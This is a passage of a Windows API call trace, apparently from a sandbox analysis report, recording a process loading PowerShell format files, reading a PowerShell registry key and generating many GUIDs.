nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3abb140*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.335] ReadFile (in: hFile=0x314, lpBuffer=0x3abb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3abb140*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.335] ReadFile (in: hFile=0x314, lpBuffer=0x3abb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3abb140*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.335] ReadFile (in: hFile=0x314, lpBuffer=0x3abb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3abb140*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.336] ReadFile (in: hFile=0x314, lpBuffer=0x3abb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3abb140*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.336] ReadFile (in: hFile=0x314, lpBuffer=0x3abb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3abb140*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.337] ReadFile (in: hFile=0x314, lpBuffer=0x3abb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3abb140*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.337] ReadFile (in: hFile=0x314, lpBuffer=0x3abb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3abb140*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.337] ReadFile (in: hFile=0x314, lpBuffer=0x3abb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3abb140*, lpNumberOfBytesRead=0x12cff8*=0xe67, lpOverlapped=0x0) returned 1 [0068.337] ReadFile (in: hFile=0x314, lpBuffer=0x3aba70f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3aba70f*, lpNumberOfBytesRead=0x12cff8*=0x0, lpOverlapped=0x0) returned 1 [0068.337] ReadFile (in: hFile=0x314, lpBuffer=0x3abb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3abb140*, lpNumberOfBytesRead=0x12cff8*=0x0, lpOverlapped=0x0) returned 1 [0068.337] SetErrorMode (uMode=0x1) returned 0x1 [0068.338] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12cfa0 | out: lpFileInformation=0x12cfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0068.338] SetErrorMode (uMode=0x1) returned 0x1 [0068.338] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d088 | out: phkResult=0x12d088*=0x314) returned 0x0 [0068.338] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d00c, lpData=0x0, lpcbData=0x12d008*=0x0 | out: lpType=0x12d00c*=0x1, lpData=0x0, lpcbData=0x12d008*=0x56) returned 0x0 [0068.338] CoTaskMemAlloc (cb=0x5a) returned 0x23eaa0 [0068.338] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cfdc, lpData=0x23eaa0, lpcbData=0x12cfd8*=0x56 | out: lpType=0x12cfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12cfd8*=0x56) returned 0x0 [0068.338] CoTaskMemFree (pv=0x23eaa0) [0068.338] RegCloseKey (hKey=0x314) returned 0x0 [0068.341] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x5f6c7d74, Data2=0xd3a4, Data3=0x4e3c, Data4=([0]=0x84, [1]=0x90, [2]=0xdd, [3]=0xbe, [4]=0x7c, [5]=0x3d, [6]=0xde, [7]=0x59))) returned 0x0 [0068.342] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xe9870ecd, Data2=0x46fd, Data3=0x4e2d, Data4=([0]=0x95, [1]=0xe8, [2]=0x2a, [3]=0xf8, [4]=0xad, [5]=0x7a, [6]=0x3, [7]=0xbc))) returned 0x0 [0068.342] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xea812ed, Data2=0x973f, Data3=0x414c, Data4=([0]=0xb5, [1]=0x82, [2]=0xbb, [3]=0xf0, [4]=0xc0, [5]=0x36, [6]=0x3, [7]=0x2d))) returned 0x0 [0068.342] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x1da999a0, Data2=0x4220, Data3=0x4a25, Data4=([0]=0x89, [1]=0x9c, [2]=0xd4, [3]=0xa1, [4]=0x20, [5]=0xff, [6]=0x23, [7]=0x7e))) returned 0x0 [0068.342] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x2966c88e, Data2=0xb443, Data3=0x4f78, Data4=([0]=0xba, [1]=0xa1, [2]=0x4a, [3]=0x9a, [4]=0xed, [5]=0x58, [6]=0xf7, [7]=0xb7))) returned 0x0 [0068.342] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x53f59b23, Data2=0x612d, Data3=0x45d6, Data4=([0]=0x99, [1]=0x77, [2]=0xa8, [3]=0xee, [4]=0x8e, [5]=0x18, [6]=0xde, [7]=0xd))) returned 0x0 [0068.342] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xe9f9990b, Data2=0xf065, Data3=0x45dd, Data4=([0]=0x97, [1]=0x1d, [2]=0x81, [3]=0x8a, [4]=0x75, [5]=0x63, [6]=0xbf, [7]=0x13))) returned 0x0 [0068.343] VirtualQuery (in: lpAddress=0x12bc60, lpBuffer=0x12cb20, dwLength=0x30 | out: lpBuffer=0x12cb20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.343] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x9e459466, Data2=0xf2b4, Data3=0x46dd, Data4=([0]=0xa5, [1]=0x2, [2]=0x17, [3]=0xd, [4]=0xb7, [5]=0xf3, [6]=0x24, [7]=0xe4))) returned 0x0 [0068.343] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xa2cfb29f, Data2=0x8ad5, Data3=0x4c1f, Data4=([0]=0x9b, [1]=0x13, [2]=0x3b, [3]=0xa2, [4]=0xaf, [5]=0x1c, [6]=0x20, [7]=0x1e))) returned 0x0 [0068.343] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x8cfc125d, Data2=0xb3a5, Data3=0x4458, Data4=([0]=0x82, [1]=0xb2, [2]=0x6e, [3]=0x45, [4]=0x67, [5]=0xca, [6]=0x26, [7]=0x41))) returned 0x0 [0068.343] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x7213377f, Data2=0x9bb2, Data3=0x4e50, Data4=([0]=0x89, [1]=0x87, [2]=0xb5, [3]=0x20, [4]=0x8d, [5]=0xab, [6]=0xe0, [7]=0x16))) returned 0x0 [0068.343] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xb6ff6a68, Data2=0xb02f, Data3=0x4413, Data4=([0]=0xb2, [1]=0x4, [2]=0x68, [3]=0x7f, [4]=0x93, [5]=0x9d, [6]=0x23, [7]=0xab))) returned 0x0 [0068.343] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xada1c54a, Data2=0xee3b, Data3=0x4c52, Data4=([0]=0x8f, [1]=0x55, [2]=0xef, [3]=0x2, [4]=0xc6, [5]=0x4b, [6]=0x6a, [7]=0x5d))) returned 0x0 [0068.344] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xa3fd3c8d, Data2=0x9fff, Data3=0x49a4, Data4=([0]=0xb7, [1]=0x8d, [2]=0x2c, [3]=0x17, [4]=0xe8, [5]=0x11, [6]=0x5f, [7]=0xa4))) returned 0x0 [0068.344] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x17c31864, Data2=0x7da3, Data3=0x435d, Data4=([0]=0x81, [1]=0x81, [2]=0x59, [3]=0x27, [4]=0x32, [5]=0x23, [6]=0xf1, [7]=0x3a))) returned 0x0 [0068.344] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xd7ccb288, Data2=0x828c, Data3=0x486e, Data4=([0]=0xb5, [1]=0xf8, [2]=0xee, [3]=0x45, [4]=0x53, [5]=0xc0, [6]=0xca, [7]=0x74))) returned 0x0 [0068.344] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xc90fe5f9, Data2=0x52a, Data3=0x4216, Data4=([0]=0xa5, [1]=0x29, [2]=0x63, [3]=0xf5, [4]=0x35, [5]=0x87, [6]=0xf3, [7]=0x86))) returned 0x0 [0068.344] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x9357747e, Data2=0xcad7, Data3=0x4302, Data4=([0]=0x8c, [1]=0x9, [2]=0x53, [3]=0xb1, [4]=0xa0, [5]=0xbc, [6]=0xf2, [7]=0x67))) returned 0x0 [0068.344] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x4f176b92, Data2=0xe809, Data3=0x4442, Data4=([0]=0x98, [1]=0xf5, [2]=0xb7, [3]=0x11, [4]=0xf0, [5]=0x6c, [6]=0x14, [7]=0xd5))) returned 0x0 [0068.344] VirtualQuery (in: lpAddress=0x12bc60, lpBuffer=0x12cb20, dwLength=0x30 | out: lpBuffer=0x12cb20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.345] VirtualQuery (in: lpAddress=0x12bc60, lpBuffer=0x12cb20, dwLength=0x30 | out: lpBuffer=0x12cb20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.345] VirtualQuery (in: lpAddress=0x12bc60, lpBuffer=0x12cb20, dwLength=0x30 | out: lpBuffer=0x12cb20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.345] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xb72a97fc, Data2=0x4216, Data3=0x4d2e, Data4=([0]=0x98, [1]=0x81, [2]=0x7c, [3]=0xbd, [4]=0x33, [5]=0xaf, [6]=0xda, [7]=0x7b))) returned 0x0 [0068.345] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x2f6fcb6d, Data2=0xad44, Data3=0x4226, Data4=([0]=0x9b, [1]=0x1c, [2]=0xa, [3]=0x90, [4]=0xe7, [5]=0x19, [6]=0xb8, [7]=0x6d))) returned 0x0 [0068.345] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x2e390687, Data2=0x6365, Data3=0x4ffd, Data4=([0]=0x94, [1]=0x12, [2]=0x55, [3]=0x94, [4]=0xe5, [5]=0xa0, [6]=0xc8, [7]=0x9d))) returned 0x0 [0068.346] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xc1302ed6, Data2=0xcee1, Data3=0x459c, Data4=([0]=0xb1, [1]=0xc1, [2]=0x23, [3]=0x73, [4]=0x75, [5]=0x10, [6]=0x19, [7]=0xc7))) returned 0x0 [0068.346] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x7f0284d, Data2=0xfb1a, Data3=0x4603, Data4=([0]=0x92, [1]=0x22, [2]=0x3d, [3]=0x80, [4]=0xee, [5]=0xc4, [6]=0x65, [7]=0x33))) returned 0x0 [0068.346] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x1fdb1889, Data2=0xca95, Data3=0x4a77, Data4=([0]=0x8a, [1]=0xe4, [2]=0x8c, [3]=0xf9, [4]=0x7, [5]=0x48, [6]=0xc, [7]=0x16))) returned 0x0 [0068.346] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xbca9641b, Data2=0xef21, Data3=0x40dc, Data4=([0]=0xa7, [1]=0xd7, [2]=0xf, [3]=0x35, [4]=0xeb, [5]=0xcd, [6]=0xc1, [7]=0x2c))) returned 0x0 [0068.346] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x773a922b, Data2=0x947e, Data3=0x4d25, Data4=([0]=0xaf, [1]=0x4a, [2]=0xa7, [3]=0xe7, [4]=0xdf, [5]=0xaf, [6]=0xca, [7]=0xea))) returned 0x0 [0068.346] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xe2343e36, Data2=0xbb52, Data3=0x4af8, Data4=([0]=0xac, [1]=0x2f, [2]=0x10, [3]=0xdb, [4]=0x20, [5]=0x16, [6]=0xa4, [7]=0x8d))) returned 0x0 [0068.347] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x871142d9, Data2=0x8858, Data3=0x4e5e, Data4=([0]=0xbd, [1]=0x31, [2]=0xa0, [3]=0x60, [4]=0x92, [5]=0xd4, [6]=0x12, [7]=0xf7))) returned 0x0 [0068.347] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x1a76ea0e, Data2=0x3a20, Data3=0x4635, Data4=([0]=0xa0, [1]=0x93, [2]=0x53, [3]=0x86, [4]=0xa8, [5]=0x2, [6]=0x8d, [7]=0x9b))) returned 0x0 [0068.347] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xb0a310a0, Data2=0x391c, Data3=0x4baf, Data4=([0]=0x97, [1]=0xdc, [2]=0xc0, [3]=0xd4, [4]=0x3d, [5]=0x91, [6]=0xb5, [7]=0xc8))) returned 0x0 [0068.347] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x2cef4b7, Data2=0x5e04, Data3=0x4acf, Data4=([0]=0x82, [1]=0xe0, [2]=0xb0, [3]=0x2, [4]=0x1d, [5]=0xc9, [6]=0x24, [7]=0x11))) returned 0x0 [0068.347] VirtualQuery (in: lpAddress=0x12bc60, lpBuffer=0x12cb20, dwLength=0x30 | out: lpBuffer=0x12cb20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.347] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x1c46b8a9, Data2=0x9bde, Data3=0x4e0b, Data4=([0]=0xae, [1]=0x86, [2]=0xb1, [3]=0xe8, [4]=0x68, [5]=0x9e, [6]=0xb0, [7]=0x8))) returned 0x0 [0068.347] VirtualQuery (in: lpAddress=0x12bc60, lpBuffer=0x12cb20, dwLength=0x30 | out: lpBuffer=0x12cb20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.349] VirtualQuery (in: lpAddress=0x12bc60, lpBuffer=0x12cb20, dwLength=0x30 | out: lpBuffer=0x12cb20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.350] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xb9ee4c9e, Data2=0x4150, Data3=0x4361, Data4=([0]=0xb0, [1]=0xc4, [2]=0x8e, [3]=0x7, [4]=0xfc, [5]=0xe6, [6]=0x9d, [7]=0xab))) returned 0x0 [0068.351] VirtualQuery (in: lpAddress=0x12bc60, lpBuffer=0x12cb20, dwLength=0x30 | out: lpBuffer=0x12cb20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.351] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x15eb54b5, Data2=0x53d1, Data3=0x4b1e, Data4=([0]=0xab, [1]=0x73, [2]=0x2e, [3]=0xfc, [4]=0x98, [5]=0x34, [6]=0x3f, [7]=0xdf))) returned 0x0 [0068.351] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x5ed09c0e, Data2=0xfeb9, Data3=0x4fe2, Data4=([0]=0xb6, [1]=0x72, [2]=0xfa, [3]=0x9d, [4]=0x39, [5]=0xf3, [6]=0x68, [7]=0x50))) returned 0x0 [0068.351] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xc0488d2, Data2=0x5c2, Data3=0x49fa, Data4=([0]=0x80, [1]=0xb, [2]=0x14, [3]=0xe8, [4]=0xc, [5]=0xdd, [6]=0xe, [7]=0xaf))) returned 0x0 [0068.351] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x7ed2e38, Data2=0xef8b, Data3=0x471c, Data4=([0]=0x82, [1]=0xdd, [2]=0x12, [3]=0xb2, [4]=0xdb, [5]=0x9a, [6]=0x2, [7]=0x5f))) returned 0x0 [0068.352] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x89ec94b0, Data2=0xe62e, Data3=0x45cc, Data4=([0]=0x8a, [1]=0x19, [2]=0x68, [3]=0x1, [4]=0xaf, [5]=0x3d, [6]=0x40, [7]=0x7c))) returned 0x0 [0068.352] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xe6b6f31a, Data2=0x3e2d, Data3=0x41f3, Data4=([0]=0xae, [1]=0xc8, [2]=0xc9, [3]=0xb6, [4]=0xdf, [5]=0x4e, [6]=0x2c, [7]=0x46))) returned 0x0 [0068.352] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xa1d5bd30, Data2=0x314e, Data3=0x46df, Data4=([0]=0x9c, [1]=0x84, [2]=0xb0, [3]=0xa5, [4]=0x7f, [5]=0x6c, [6]=0x4d, [7]=0xc3))) returned 0x0 [0068.352] VirtualQuery (in: lpAddress=0x12bc60, lpBuffer=0x12cb20, dwLength=0x30 | out: lpBuffer=0x12cb20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.352] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x5ca09ab, Data2=0xbb29, Data3=0x41fc, Data4=([0]=0xb4, [1]=0xa0, [2]=0xb1, [3]=0xbc, [4]=0x68, [5]=0xef, [6]=0xef, [7]=0x1a))) returned 0x0 [0068.353] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x201218b5, Data2=0x8e66, Data3=0x457b, Data4=([0]=0x85, [1]=0x82, [2]=0x23, [3]=0x7a, [4]=0xf3, [5]=0x5f, [6]=0x78, [7]=0x37))) returned 0x0 [0068.353] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xb13ef112, Data2=0xc4c1, Data3=0x4d07, Data4=([0]=0x91, [1]=0x2b, [2]=0x1b, [3]=0xe2, [4]=0x15, [5]=0xc, [6]=0xd5, [7]=0xec))) returned 0x0 [0068.353] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xab20c031, Data2=0xc938, Data3=0x4c8d, Data4=([0]=0xa2, [1]=0x54, [2]=0xce, [3]=0x5b, [4]=0xac, [5]=0xad, [6]=0x37, [7]=0xa8))) returned 0x0 [0068.353] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x22e99458, Data2=0xd3ec, Data3=0x4ff3, Data4=([0]=0xa2, [1]=0xc2, [2]=0x6d, [3]=0x34, [4]=0x93, [5]=0x25, [6]=0x4e, [7]=0xc))) returned 0x0 [0068.353] VirtualQuery (in: lpAddress=0x12bc60, lpBuffer=0x12cb20, dwLength=0x30 | out: lpBuffer=0x12cb20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.353] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x20397dc8, Data2=0xc8eb, Data3=0x4653, Data4=([0]=0xb6, [1]=0x8, [2]=0x73, [3]=0xc7, [4]=0x44, [5]=0x1d, [6]=0xcb, [7]=0x93))) returned 0x0 [0068.354] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xdda4341c, Data2=0x9a34, Data3=0x4110, Data4=([0]=0xa0, [1]=0x54, [2]=0x3f, [3]=0x5a, [4]=0xb1, [5]=0x9a, [6]=0x33, [7]=0x61))) returned 0x0 [0068.354] VirtualQuery (in: lpAddress=0x12bcd0, lpBuffer=0x12cb90, dwLength=0x30 | out: lpBuffer=0x12cb90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.354] VirtualQuery (in: lpAddress=0x12bcd0, lpBuffer=0x12cb90, dwLength=0x30 | out: lpBuffer=0x12cb90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.354] VirtualQuery (in: lpAddress=0x12bcd0, lpBuffer=0x12cb90, dwLength=0x30 | out: lpBuffer=0x12cb90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.354] VirtualQuery (in: lpAddress=0x12bcd0, lpBuffer=0x12cb90, dwLength=0x30 | out: lpBuffer=0x12cb90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.354] SetErrorMode (uMode=0x1) returned 0x1 [0068.355] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314 [0068.355] SetErrorMode (uMode=0x1) returned 0x1 [0068.355] GetFileType (hFile=0x314) returned 0x1 [0068.355] ReadFile (in: hFile=0x314, lpBuffer=0x3c190d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3c190d8*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.356] ReadFile (in: hFile=0x314, lpBuffer=0x3c190d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3c190d8*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.356] ReadFile (in: hFile=0x314, lpBuffer=0x3c190d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3c190d8*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.356] ReadFile (in: hFile=0x314, lpBuffer=0x3c190d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3c190d8*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.357] ReadFile (in: hFile=0x314, lpBuffer=0x3c190d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3c190d8*, lpNumberOfBytesRead=0x12cff8*=0x8b4, lpOverlapped=0x0) returned 1 [0068.357] ReadFile (in: hFile=0x314, lpBuffer=0x3c184f4, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3c184f4*, lpNumberOfBytesRead=0x12cff8*=0x0, lpOverlapped=0x0) returned 1 [0068.357] ReadFile (in: hFile=0x314, lpBuffer=0x3c190d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3c190d8*, lpNumberOfBytesRead=0x12cff8*=0x0, lpOverlapped=0x0) returned 1 [0068.357] SetErrorMode (uMode=0x1) returned 0x1 [0068.369] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12cfa0 | out: lpFileInformation=0x12cfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0068.369] SetErrorMode (uMode=0x1) returned 0x1 [0068.369] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d088 | out: phkResult=0x12d088*=0x314) returned 0x0 [0068.369] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d00c, lpData=0x0, lpcbData=0x12d008*=0x0 | out: lpType=0x12d00c*=0x1, lpData=0x0, lpcbData=0x12d008*=0x56) returned 0x0 [0068.369] CoTaskMemAlloc (cb=0x5a) returned 0x23eaa0 [0068.369] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cfdc, lpData=0x23eaa0, lpcbData=0x12cfd8*=0x56 | out: lpType=0x12cfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12cfd8*=0x56) returned 0x0 [0068.369] CoTaskMemFree (pv=0x23eaa0) [0068.369] RegCloseKey (hKey=0x314) returned 0x0 [0068.370] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xa71a4876, Data2=0x65e5, Data3=0x403a, Data4=([0]=0xb9, [1]=0x0, [2]=0x0, [3]=0x1a, [4]=0xda, [5]=0x74, [6]=0xd6, 